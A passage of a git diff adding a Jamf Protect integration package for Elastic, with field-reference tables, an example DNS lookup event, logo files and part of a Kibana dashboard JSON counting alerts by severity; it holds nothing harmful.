+| event.original | Raw text message of entire event. Used to demonstrate log integrity or where the full log message (before splitting it up in multiple parts) may be required, e.g. for reindex. This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, please see `Field data types` in the `Elasticsearch Reference`. | keyword |
+| event.outcome | This is one of four ECS Categorization Fields, and indicates the lowest level in the ECS category hierarchy. `event.outcome` simply denotes whether the event represents a success or a failure from the perspective of the entity that produced the event. Note that when a single transaction is described in multiple events, each event may populate different values of `event.outcome`, according to their perspective. Also note that in the case of a compound event (a single event that contains multiple logical events), this field should be populated with the value that best captures the overall success or failure from the perspective of the event producer. Further note that not all events will have an associated outcome. For example, this field is generally not populated for metric events, events with `event.type:info`, or any events for which an outcome does not make logical sense. | keyword |
+| event.provider | Source of the event. Event transports such as Syslog or the Windows Event Log typically mention the source of an event. It can be the name of the software that generated the event (e.g. Sysmon, httpd), or of a subsystem of the operating system (kernel, Microsoft-Windows-Security-Auditing). | keyword |
+| event.severity | The numeric severity of the event according to your event source. What the different severity values mean can be different between sources and use cases. It's up to the implementer to make sure severities are consistent across events from the same source. The Syslog severity belongs in `log.syslog.severity.code`. `event.severity` is meant to represent the severity according to the event source (e.g. firewall, IDS). If the event source does not publish its own severity, you may optionally copy the `log.syslog.severity.code` to `event.severity`. | long |
+| event.start | `event.start` contains the date when the event started or when the activity was first observed. | date |
+| event.timezone | This field should be populated when the event's timestamp does not include timezone information already (e.g. default Syslog timestamps). It's optional otherwise. Acceptable timezone formats are: a canonical ID (e.g. "Europe/Amsterdam"), abbreviated (e.g. "EST") or an HH:mm differential (e.g. "-05:00"). | keyword |
+| event.type | This is one of four ECS Categorization Fields, and indicates the third level in the ECS category hierarchy. `event.type` represents a categorization "sub-bucket" that, when used along with the `event.category` field values, enables filtering events down to a level appropriate for single visualization. This field is an array. This will allow proper categorization of some events that fall in multiple event types. | keyword |
+| file.code_signature.signing_id | The identifier used to sign the process. This is used to identify the application manufactured by a software vendor. The field is relevant to Apple \*OS only. | keyword |
+| file.code_signature.status | Additional information about the certificate status. This is useful for logging cryptographic errors with the certificate validity or trust status. Leave unpopulated if the validity or trust of the certificate was unchecked. | keyword |
+| file.code_signature.team_id | The team identifier used to sign the process. This is used to identify the team or vendor of a software product. The field is relevant to Apple \*OS only. | keyword |
+| file.extension | File extension, excluding the leading dot. Note that when the file name has multiple extensions (example.tar.gz), only the last one should be captured ("gz", not "tar.gz"). | keyword |
+| file.gid | Primary group ID (GID) of the file. | keyword |
+| file.hash.md5 | MD5 hash. | keyword |
+| file.hash.sha1 | SHA1 hash. | keyword |
+| file.hash.sha256 | SHA256 hash. | keyword |
+| file.hash.sha512 | SHA512 hash. | keyword |
+| file.inode | Inode representing the file in the filesystem. | keyword |
+| file.mode | Mode of the file in octal representation. | keyword |
+| file.name | Name of the file including the extension, without the directory. | keyword |
+| file.path | Full path to the file, including the file name. It should include the drive letter, when appropriate. | keyword |
+| file.path.text | Multi-field of `file.path`. | match_only_text |
+| file.size | File size in bytes. Only relevant when `file.type` is "file". | long |
+| file.uid | The user ID (UID) or security identifier (SID) of the file owner. | keyword |
+| group.id | Unique identifier for the group on the system/platform. | keyword |
+| group.name | Name of the group. | keyword |
+| host.geo.country_iso_code | Country ISO code. | keyword |
+| log.file.path | Full path to the log file this event came from, including the file name. It should include the drive letter, when appropriate. If the event wasn't read from a log file, do not populate this field. | keyword |
+| log.logger | The name of the logger inside an application. This is usually the name of the class which initialized the logger, or can be a custom name. | keyword |
+| message | For log events the message field contains the log message, optimized for viewing in a log viewer. For structured logs without an original message field, other fields can be concatenated to form a human-readable summary of the event. If multiple messages exist, they can be combined into one message. | match_only_text |
+| network.direction | Direction of the network traffic. When mapping events from a host-based monitoring context, populate this field from the host's point of view, using the values "ingress" or "egress". When mapping events from a network or perimeter-based monitoring context, populate this field from the point of view of the network perimeter, using the values "inbound", "outbound", "internal" or "external". Note that "internal" is not crossing perimeter boundaries, and is meant to describe communication between two hosts within the perimeter. Note also that "external" is meant to describe traffic between two hosts that are external to the perimeter. This could for example be useful for ISPs or VPN service providers. | keyword |
+| network.transport | Same as network.iana_number, but instead using the Keyword name of the transport layer (udp, tcp, ipv6-icmp, etc.) The field value must be normalized to lowercase for querying. | keyword |
+| observer.name | Custom name of the observer. This is a name that can be given to an observer. This can be helpful for example if multiple firewalls of the same model are used in an organization. If no custom name is needed, the field can be left empty. | keyword |
+| observer.product | The product name of the observer. | keyword |
+| observer.type | The type of the observer the data is coming from. There is no predefined list of observer types. Some examples are `forwarder`, `firewall`, `ids`, `ips`, `proxy`, `poller`, `sensor`, `APM server`. | keyword |
+| observer.vendor | Vendor name of the observer. | keyword |
+| organization.id | | keyword |
+| process.args | Array of process arguments, starting with the absolute path to the executable. May be filtered to protect sensitive information. | keyword |
+| process.args_count | Length of the process.args array. This field can be useful for querying or performing bucket analysis on how many arguments were provided to start a process. More arguments may be an indication of suspicious activity. | long |
+| process.code_signature.signing_id | The identifier used to sign the process. This is used to identify the application manufactured by a software vendor. The field is relevant to Apple \*OS only. | keyword |
+| process.code_signature.status | Additional information about the certificate status. This is useful for logging cryptographic errors with the certificate validity or trust status. Leave unpopulated if the validity or trust of the certificate was unchecked. | keyword |
+| process.code_signature.team_id | The team identifier used to sign the process. This is used to identify the team or vendor of a software product. The field is relevant to Apple \*OS only. | keyword |
+| process.command_line | Full command line that started the process, including the absolute path to the executable, and all arguments. Some arguments may be filtered to protect sensitive information. | wildcard |
+| process.command_line.text | Multi-field of `process.command_line`. | match_only_text |
+| process.executable | Absolute path to the process executable. | keyword |
+| process.executable.text | Multi-field of `process.executable`. | match_only_text |
+| process.exit_code | The exit code of the process, if this is a termination event. The field should be absent if there is no exit code for the event (e.g. process start). | long |
+| process.group_leader.pid | Process id. | long |
+| process.hash.md5 | MD5 hash. | keyword |
+| process.hash.sha1 | SHA1 hash. | keyword |
+| process.hash.sha256 | SHA256 hash. | keyword |
+| process.name | Process name. Sometimes called program name or similar. | keyword |
+| process.name.text | Multi-field of `process.name`. | match_only_text |
+| process.parent.pid | Process id. | long |
+| process.parent.start | The time the process started. | date |
+| process.pid | Process id. | long |
+| process.real_group.id | Unique identifier for the group on the system/platform. | keyword |
+| process.real_user.id | Unique identifier of the user. | keyword |
+| process.start | The time the process started. | date |
+| process.tty | Information about the controlling TTY device. If set, the process belongs to an interactive session. | object |
+| process.user.id | Unique identifier of the user. | keyword |
+| related.hash | All the hashes seen on your event. Populating this field, then using it to search for hashes can help in situations where you're unsure what the hash algorithm is (and therefore which key name to search). | keyword |
+| related.hosts | All hostnames or other host identifiers seen on your event. Example identifiers include FQDNs, domain names, workstation names, or aliases. | keyword |
+| related.ip | All of the IPs seen on your event. | ip |
+| related.user | All the user names or other user identifiers seen on the event. | keyword |
+| rule.description | The description of the rule generating the event. | keyword |
+| rule.id | A rule ID that is unique within the scope of an agent, observer, or other entity using the rule for detection of this event. | keyword |
+| rule.name | The name of the rule or signature generating the event. | keyword |
+| source.domain | The domain name of the source system. This value may be a host name, a fully qualified domain name, or another host naming format. The value may derive from the original event or be added from enrichment. | keyword |
+| source.ip | IP address of the source (IPv4 or IPv6). | ip |
+| source.port | Port of the source. | long |
+| tags | List of keywords used to tag each event. | keyword |
+| threat.enrichments | A list of associated indicators objects enriching the event, and the context of that association/enrichment. | nested |
+| threat.framework | Name of the threat framework used to further categorize and classify the tactic and technique of the reported threat. Framework classification can be provided by detecting systems, evaluated at ingest time, or retrospectively tagged to events. | keyword |
+| threat.software.platforms | The platforms of the software used by this threat to conduct behavior commonly modeled using MITRE ATT&CK®. While not required, you can use MITRE ATT&CK® software platform values. | keyword |
+| threat.tactic.id | The id of tactic used by this threat. You can use a MITRE ATT&CK® tactic, for example. (ex. https://attack.mitre.org/tactics/TA0002/ ) | keyword |
+| threat.tactic.name | Name of the type of tactic used by this threat. You can use a MITRE ATT&CK® tactic, for example. (ex. https://attack.mitre.org/tactics/TA0002/) | keyword |
+| threat.tactic.reference | The reference url of tactic used by this threat. You can use a MITRE ATT&CK® tactic, for example. (ex. https://attack.mitre.org/tactics/TA0002/ ) | keyword |
+| threat.technique.id | The id of technique used by this threat. You can use a MITRE ATT&CK® technique, for example. (ex. https://attack.mitre.org/techniques/T1059/) | keyword |
+| threat.technique.name | The name of technique used by this threat. You can use a MITRE ATT&CK® technique, for example. (ex. https://attack.mitre.org/techniques/T1059/) | keyword |
+| threat.technique.name.text | Multi-field of `threat.technique.name`. | match_only_text |
+| threat.technique.reference | The reference url of technique used by this threat. You can use a MITRE ATT&CK® technique, for example. (ex. https://attack.mitre.org/techniques/T1059/) | keyword |
+| user.domain | Name of the directory the user is a member of. For example, an LDAP or Active Directory domain name. | keyword |
+| user.email | User email address. | keyword |
+| user.id | Unique identifier of the user. | keyword |
+| user.name | Short name or login of the user. | keyword |
+| user.name.text | Multi-field of `user.name`. | match_only_text |
+| volume.bus_type | | keyword |
+| volume.file_system_type | | keyword |
+| volume.nt_name | | keyword |
+| volume.product_id | | keyword |
+| volume.product_name | | keyword |
+| volume.removable | | boolean |
+| volume.serial_number | | keyword |
+| volume.size | | long |
+| volume.vendor_id | | keyword |
+| volume.vendor_name | | keyword |
+| volume.writable | | boolean |
+
+
+#### network traffic stream
+
+This is the `Network Traffic Stream` dataset.
+
+##### Example
+
+An example event for `web_traffic_events` looks as following:
+
+```json
+{
+ "dns": {
+ "answers": {
+ "ttl": 101,
+ "type": "HTTPS"
+ },
+ "question": {
+ "name": "s.youtube.com",
+ "registered_domain": "youtube",
+ "top_level_domain": "com"
+ },
+ "response_code": "NOERROR"
+ },
+ "ecs": {
+ "version": "8.11.0"
+ },
+ "event": {
+ "action": "DNS Lookup",
+ "category": [
+ "host",
+ "network"
+ ],
+ "kind": "event",
+ "module": "jamf_protect",
+ "outcome": [
+ "success"
+ ],
+ "provider": "Jamf Protect",
+ "reason": "CLEAN",
+ "start": "2024-02-02T06:26:04.273Z",
+ "type": [
+ "connection"
+ ]
+ },
+ "host": {
+ "id": "3453be41-0f2d-4d43-9ec2-a53f39fff93c",
+ "os": {
+ "type": [
+ "ios"
+ ]
+ }
+ },
+ "interface": {
+ "name": "WIFI"
+ },
+ "jamf_protect": {},
+ "observer": {
+ "product": "Jamf Protect",
+ "vendor": "Jamf"
+ },
+ "organization": {
+ "id": "9608556b-0c3a-4a9c-9b4a-d714d8a028a1"
+ },
+ "rule": {
+ "name": "DNS Lookup"
+ },
+ "user": {
+ "email": "user@acme.com",
+ "name": "07a5a2ae-16de-4767-831e-0ea8b7c3abe4"
+ }
+}
+```
+
+**Exported fields**
+
+| Field | Description | Type |
+|---|---|---|
+| @timestamp | Event timestamp. | date |
+| data_stream.dataset | Data stream dataset. | constant_keyword |
+| data_stream.namespace | Data stream namespace. | constant_keyword |
+| data_stream.type | Data stream type. | constant_keyword |
+| destination.address | Some event destination addresses are defined ambiguously. The event will sometimes list an IP, a domain or a unix socket. You should always store the raw address in the `.address` field. Then it should be duplicated to `.ip` or `.domain`, depending on which one it is. | keyword |
+| destination.as.number | Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. | long |
+| destination.as.organization.name | Organization name. | keyword |
+| destination.as.organization.name.text | Multi-field of `destination.as.organization.name`. | match_only_text |
+| destination.domain | The domain name of the destination system. This value may be a host name, a fully qualified domain name, or another host naming format. The value may derive from the original event or be added from enrichment. | keyword |
+| destination.geo.city_name | City name. | keyword |
+| destination.geo.continent_name | Name of the continent. | keyword |
+| destination.geo.country_iso_code | Country ISO code. | keyword |
+| destination.geo.country_name | Country name. | keyword |
+| destination.geo.location | Longitude and latitude. | geo_point |
+| destination.ip | IP address of the destination (IPv4 or IPv6). | ip |
+| destination.port | Port of the destination. | long |
+| dns.answers.ttl | The time interval in seconds that this resource record may be cached before it should be discarded. Zero values mean that the data should not be cached. | long |
+| dns.answers.type | The type of data contained in this resource record. | keyword |
+| dns.question.name | The name being queried. If the name field contains non-printable characters (below 32 or above 126), those characters should be represented as escaped base 10 integers (\DDD). Back slashes and quotes should be escaped. Tabs, carriage returns, and line feeds should be converted to \t, \r, and \n respectively. | keyword |
+| dns.question.registered_domain | The highest registered domain, stripped of the subdomain. For example, the registered domain for "foo.example.com" is "example.com". This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last two labels will not work well for TLDs such as "co.uk". | keyword |
+| dns.question.top_level_domain | The effective top level domain (eTLD), also known as the domain suffix, is the last part of the domain name. For example, the top level domain for example.com is "com". This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last label will not work well for effective TLDs such as "co.uk". | keyword |
+| dns.response_code | The DNS response code. | keyword |
+| ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword |
+| error.message | Error message. | match_only_text |
+| event.action | The action captured by the event. This describes the information in the event. It is more specific than `event.category`. Examples are `group-add`, `process-started`, `file-created`. The value is normally defined by the implementer. | keyword |
+| event.category | This is one of four ECS Categorization Fields, and indicates the second level in the ECS category hierarchy. `event.category` represents the "big buckets" of ECS categories. For example, filtering on `event.category:process` yields all events relating to process activity. This field is closely related to `event.type`, which is used as a subcategory. This field is an array. This will allow proper categorization of some events that fall in multiple categories. | keyword |
+| event.code | Identification code for this event, if one exists. Some event sources use event codes to identify messages unambiguously, regardless of message language or wording adjustments over time. An example of this is the Windows Event ID. | keyword |
+| event.created | `event.created` contains the date/time when the event was first read by an agent, or by your pipeline. This field is distinct from `@timestamp` in that `@timestamp` typically contain the time extracted from the original event. In most situations, these two timestamps will be slightly different. The difference can be used to calculate the delay between your source generating an event, and the time when your agent first processed it. This can be used to monitor your agent's or pipeline's ability to keep up with your event source. In case the two timestamps are identical, `@timestamp` should be used. | date |
+| event.dataset | Name of the dataset. | constant_keyword |
+| event.duration | Duration of the event in nanoseconds. If `event.start` and `event.end` are known this value should be the difference between the end and start time. | long |
+| event.end | `event.end` contains the date when the event ended or when the activity was last observed. | date |
+| event.id | Unique ID to describe the event. | keyword |
+| event.ingested | Timestamp when an event arrived in the central data store. This is different from `@timestamp`, which is when the event originally occurred. It's also different from `event.created`, which is meant to capture the first time an agent saw the event. In normal conditions, assuming no tampering, the timestamps should chronologically look like this: `@timestamp` \< `event.created` \< `event.ingested`. | date |
+| event.kind | This is one of four ECS Categorization Fields, and indicates the highest level in the ECS category hierarchy. `event.kind` gives high-level information about what type of information the event contains, without being specific to the contents of the event. For example, values of this field distinguish alert events from metric events. The value of this field can be used to inform how these kinds of events should be handled. They may warrant different retention, different access control, it may also help understand whether the data is coming in at a regular interval or not. | keyword |
+| event.module | Event module. | constant_keyword |
+| event.original | Raw text message of entire event. Used to demonstrate log integrity or where the full log message (before splitting it up in multiple parts) may be required, e.g. for reindex. This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, please see `Field data types` in the `Elasticsearch Reference`. | keyword |
+| event.outcome | This is one of four ECS Categorization Fields, and indicates the lowest level in the ECS category hierarchy. `event.outcome` simply denotes whether the event represents a success or a failure from the perspective of the entity that produced the event. Note that when a single transaction is described in multiple events, each event may populate different values of `event.outcome`, according to their perspective. Also note that in the case of a compound event (a single event that contains multiple logical events), this field should be populated with the value that best captures the overall success or failure from the perspective of the event producer. Further note that not all events will have an associated outcome. For example, this field is generally not populated for metric events, events with `event.type:info`, or any events for which an outcome does not make logical sense. | keyword |
+| event.provider | Source of the event. Event transports such as Syslog or the Windows Event Log typically mention the source of an event. It can be the name of the software that generated the event (e.g. Sysmon, httpd), or of a subsystem of the operating system (kernel, Microsoft-Windows-Security-Auditing). | keyword |
+| event.severity | The numeric severity of the event according to your event source. What the different severity values mean can be different between sources and use cases. It's up to the implementer to make sure severities are consistent across events from the same source. The Syslog severity belongs in `log.syslog.severity.code`. `event.severity` is meant to represent the severity according to the event source (e.g. firewall, IDS). If the event source does not publish its own severity, you may optionally copy the `log.syslog.severity.code` to `event.severity`. | long |
+| event.start | `event.start` contains the date when the event started or when the activity was first observed. | date |
+| event.timezone | This field should be populated when the event's timestamp does not include timezone information already (e.g. default Syslog timestamps). It's optional otherwise. Acceptable timezone formats are: a canonical ID (e.g. "Europe/Amsterdam"), abbreviated (e.g. "EST") or an HH:mm differential (e.g. "-05:00"). | keyword |
+| event.type | This is one of four ECS Categorization Fields, and indicates the third level in the ECS category hierarchy. `event.type` represents a categorization "sub-bucket" that, when used along with the `event.category` field values, enables filtering events down to a level appropriate for single visualization. This field is an array. This will allow proper categorization of some events that fall in multiple event types. | keyword |
+| file.code_signature.signing_id | The identifier used to sign the process. This is used to identify the application manufactured by a software vendor. The field is relevant to Apple \*OS only. | keyword |
+| file.code_signature.status | Additional information about the certificate status. This is useful for logging cryptographic errors with the certificate validity or trust status. Leave unpopulated if the validity or trust of the certificate was unchecked. | keyword |
+| file.code_signature.team_id | The team identifier used to sign the process. This is used to identify the team or vendor of a software product. The field is relevant to Apple \*OS only. | keyword |
+| file.extension | File extension, excluding the leading dot. Note that when the file name has multiple extensions (example.tar.gz), only the last one should be captured ("gz", not "tar.gz"). | keyword |
+| file.gid | Primary group ID (GID) of the file. | keyword |
+| file.hash.md5 | MD5 hash. | keyword |
+| file.hash.sha1 | SHA1 hash. | keyword |
+| file.hash.sha256 | SHA256 hash. | keyword |
+| file.hash.sha512 | SHA512 hash. | keyword |
+| file.inode | Inode representing the file in the filesystem. | keyword |
+| file.mode | Mode of the file in octal representation. | keyword |
+| file.name | Name of the file including the extension, without the directory. | keyword |
+| file.path | Full path to the file, including the file name. It should include the drive letter, when appropriate. | keyword |
+| file.path.text | Multi-field of `file.path`. | match_only_text |
+| file.size | File size in bytes. Only relevant when `file.type` is "file". | long |
+| file.uid | The user ID (UID) or security identifier (SID) of the file owner. | keyword |
+| group.id | Unique identifier for the group on the system/platform. | keyword |
+| group.name | Name of the group. | keyword |
+| host.geo.country_iso_code | Country ISO code. | keyword |
+| interface.name | Interface name as reported by the system. | keyword |
+| log.file.path | Full path to the log file this event came from, including the file name. It should include the drive letter, when appropriate. If the event wasn't read from a log file, do not populate this field. | keyword |
+| log.logger | The name of the logger inside an application. This is usually the name of the class which initialized the logger, or can be a custom name. | keyword |
+| message | For log events the message field contains the log message, optimized for viewing in a log viewer. For structured logs without an original message field, other fields can be concatenated to form a human-readable summary of the event. If multiple messages exist, they can be combined into one message. | match_only_text |
+| network.direction | Direction of the network traffic. When mapping events from a host-based monitoring context, populate this field from the host's point of view, using the values "ingress" or "egress". When mapping events from a network or perimeter-based monitoring context, populate this field from the point of view of the network perimeter, using the values "inbound", "outbound", "internal" or "external". Note that "internal" is not crossing perimeter boundaries, and is meant to describe communication between two hosts within the perimeter. Note also that "external" is meant to describe traffic between two hosts that are external to the perimeter. This could for example be useful for ISPs or VPN service providers. | keyword |
+| network.transport | Same as network.iana_number, but instead using the Keyword name of the transport layer (udp, tcp, ipv6-icmp, etc.) The field value must be normalized to lowercase for querying. | keyword |
+| observer.name | Custom name of the observer. This is a name that can be given to an observer. This can be helpful for example if multiple firewalls of the same model are used in an organization. If no custom name is needed, the field can be left empty. | keyword |
+| observer.product | The product name of the observer. | keyword |
+| observer.type | The type of the observer the data is coming from. There is no predefined list of observer types. Some examples are `forwarder`, `firewall`, `ids`, `ips`, `proxy`, `poller`, `sensor`, `APM server`. | keyword |
+| observer.vendor | Vendor name of the observer. | keyword |
+| organization.id | | keyword |
+| process.command_line | Full command line that started the process, including the absolute path to the executable, and all arguments. Some arguments may be filtered to protect sensitive information. | wildcard |
+| process.command_line.text | Multi-field of `process.command_line`. | match_only_text |
+| process.parent.pid | Process id. | long |
+| process.parent.start | The time the process started. | date |
+| process.pid | Process id. | long |
+| process.start | The time the process started. | date |
+| related.hash | All the hashes seen on your event. Populating this field, then using it to search for hashes can help in situations where you're unsure what the hash algorithm is (and therefore which key name to search). | keyword |
+| related.hosts | All hostnames or other host identifiers seen on your event. Example identifiers include FQDNs, domain names, workstation names, or aliases. | keyword |
+| related.ip | All of the IPs seen on your event. | ip |
+| related.user | All the user names or other user identifiers seen on the event. | keyword |
+| rule.description | The description of the rule generating the event. | keyword |
+| rule.id | A rule ID that is unique within the scope of an agent, observer, or other entity using the rule for detection of this event. | keyword |
+| rule.name | The name of the rule or signature generating the event. | keyword |
+| source.domain | The domain name of the source system. This value may be a host name, a fully qualified domain name, or another host naming format. The value may derive from the original event or be added from enrichment. | keyword |
+| source.ip | IP address of the source (IPv4 or IPv6). | ip |
+| source.port | Port of the source. | long |
+| tags | List of keywords used to tag each event. | keyword |
+| user.domain | Name of the directory the user is a member of. For example, an LDAP or Active Directory domain name. | keyword |
+| user.email | User email address. | keyword |
+| user.id | Unique identifier of the user. | keyword |
+| user.name | Short name or login of the user. | keyword |
+| user.name.text | Multi-field of `user.name`. | match_only_text |
diff --git a/packages/jamf_protect/img/jamf_logo.svg b/packages/jamf_protect/img/jamf_logo.svg
new file mode 100644
index 00000000000..a281ed4b057
--- /dev/null
+++ b/packages/jamf_protect/img/jamf_logo.svg
@@ -0,0 +1 @@
+
\ No newline at end of file
diff --git a/packages/jamf_protect/img/jamfprotect_kibana.png b/packages/jamf_protect/img/jamfprotect_kibana.png
new file mode 100644
index 00000000000..60699e21045
Binary files /dev/null and b/packages/jamf_protect/img/jamfprotect_kibana.png differ
diff --git a/packages/jamf_protect/kibana/dashboard/jamf_protect-e9b86210-c65c-11ee-882f-57f79af43d7f.json b/packages/jamf_protect/kibana/dashboard/jamf_protect-e9b86210-c65c-11ee-882f-57f79af43d7f.json
new file mode 100644
index 00000000000..8e6ffc2ea67
--- /dev/null
+++ b/packages/jamf_protect/kibana/dashboard/jamf_protect-e9b86210-c65c-11ee-882f-57f79af43d7f.json
@@ -0,0 +1,1949 @@ +{ + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "oneLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"d1892683-e559-40f2-9b70-90e8e29439f7\":{\"type\":\"optionsListControl\",\"order\":1,\"grow\":true,\"width\":\"small\",\"explicitInput\":{\"id\":\"d1892683-e559-40f2-9b70-90e8e29439f7\",\"fieldName\":\"host.hostname\",\"title\":\"hostname\",\"grow\":true,\"width\":\"small\",\"enhancements\":{},\"selectedOptions\":[]}},\"04593aef-ec66-4a07-a579-13a12d086631\":{\"type\":\"optionsListControl\",\"order\":2,\"grow\":true,\"width\":\"small\",\"explicitInput\":{\"id\":\"04593aef-ec66-4a07-a579-13a12d086631\",\"fieldName\":\"event.module\",\"title\":\"Product module\",\"grow\":true,\"width\":\"small\",\"selectedOptions\":[],\"existsSelected\":false,\"enhancements\":{}}},\"bcdd443f-9e3d-4186-be15-ba54190ae096\":{\"type\":\"timeSlider\",\"order\":0,\"grow\":true,\"width\":\"large\",\"explicitInput\":{\"id\":\"bcdd443f-9e3d-4186-be15-ba54190ae096\",\"title\":\"Time slider\",\"enhancements\":{},\"timesliceStartAsPercentageOfTimeRange\":0.08333333429783951,\"timesliceEndAsPercentageOfTimeRange\":0.9583333444251545}}}" + }, + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "id": "", + "params": { + "fontSize": 12, + "markdown": "### Jamf Protect\n\nThis Kibana dashboard features a range of visualizations highlighting key events and 
the most recent alerts. It serves as a customizable template, allowing adjustments to meet specific organizational needs.\n", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + } + }, + "gridData": { + "h": 5, + "i": "1e937160-72d3-495f-9d99-a5441c7f7a72", + "w": 48, + "x": 0, + "y": 0 + }, + "panelIndex": "1e937160-72d3-495f-9d99-a5441c7f7a72", + "type": "visualization" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-bbbfa9bf-6f8a-4a2a-bae1-04e7b8b5649b", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "bbbfa9bf-6f8a-4a2a-bae1-04e7b8b5649b": { + "columnOrder": [ + "5760cc55-e167-4ca1-882c-27413cb07e5e" + ], + "columns": { + "5760cc55-e167-4ca1-882c-27413cb07e5e": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "" + }, + "isBucketed": false, + "label": "Low Alerts", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "event.severity" + } + }, + "incompleteColumns": {} + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "(observer.product : \"Jamf Protect\" and event.module : \"Alerts\" and event.severity : 1) or (observer.product :\"Jamf Protect\" and event.module :\"Threat Events Stream\" and event.severity : 4)" + }, + "visualization": { + "accessor": "5760cc55-e167-4ca1-882c-27413cb07e5e", + "colorMode": "Background", + "layerId": "bbbfa9bf-6f8a-4a2a-bae1-04e7b8b5649b", + "layerType": "data", + "palette": { + "name": "custom", + "params": { + "colorStops": [ + { + "color": "#D6BF57", + "stop": null + } + ], + "continuity": "all", + "maxSteps": 5, + "name": "custom", + "progression": "fixed", + "rangeMax": 
null, + "rangeMin": null, + "rangeType": "number", + "reverse": false, + "steps": 3, + "stops": [ + { + "color": "#D6BF57", + "stop": 4 + } + ] + }, + "type": "palette" + } + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 8, + "i": "a8e0995f-628e-43ff-8052-0ec18332c1da", + "w": 16, + "x": 0, + "y": 5 + }, + "panelIndex": "a8e0995f-628e-43ff-8052-0ec18332c1da", + "title": "Low Alerts", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-bbbfa9bf-6f8a-4a2a-bae1-04e7b8b5649b", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "logs-*", + "layers": { + "bbbfa9bf-6f8a-4a2a-bae1-04e7b8b5649b": { + "columnOrder": [ + "5760cc55-e167-4ca1-882c-27413cb07e5e" + ], + "columns": { + "5760cc55-e167-4ca1-882c-27413cb07e5e": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "" + }, + "isBucketed": false, + "label": "Medium Alerts", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "event.severity" + } + }, + "incompleteColumns": {}, + "indexPatternId": "logs-*" + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "(observer.product : \"Jamf Protect\" and event.module : \"Alerts\" and event.severity : 2) or (observer.product :\"Jamf Protect\" and event.module :\"Threat Events Stream\" and event.severity : 6)" + }, + "visualization": { + "accessor": "5760cc55-e167-4ca1-882c-27413cb07e5e", + "colorMode": "Background", + "layerId": "bbbfa9bf-6f8a-4a2a-bae1-04e7b8b5649b", + "layerType": "data", + "palette": { + "name": "custom", + 
"params": { + "colorStops": [ + { + "color": "#DA8B45", + "stop": null + } + ], + "continuity": "all", + "maxSteps": 5, + "name": "custom", + "progression": "fixed", + "rangeMax": null, + "rangeMin": null, + "rangeType": "number", + "reverse": false, + "steps": 3, + "stops": [ + { + "color": "#DA8B45", + "stop": 4 + } + ] + }, + "type": "palette" + } + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": { + "dynamicActions": { + "events": [ + { + "action": { + "config": { + "openInNewTab": true + }, + "factoryId": "OPEN_IN_DISCOVER_DRILLDOWN", + "name": "Review alerts" + }, + "eventId": "585bae4f-9417-4f77-82ec-8f5c84ecde25", + "triggers": [ + "FILTER_TRIGGER" + ] + } + ] + } + }, + "hidePanelTitles": false + }, + "gridData": { + "h": 8, + "i": "1d177394-ad48-4393-b81c-319a894a5686", + "w": 16, + "x": 16, + "y": 5 + }, + "panelIndex": "1d177394-ad48-4393-b81c-319a894a5686", + "title": "Medium Alerts", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-bbbfa9bf-6f8a-4a2a-bae1-04e7b8b5649b", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "bbbfa9bf-6f8a-4a2a-bae1-04e7b8b5649b": { + "columnOrder": [ + "5760cc55-e167-4ca1-882c-27413cb07e5e" + ], + "columns": { + "5760cc55-e167-4ca1-882c-27413cb07e5e": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "" + }, + "isBucketed": false, + "label": "Medium Alerts", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "event.severity" + } + }, + "incompleteColumns": {} + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": 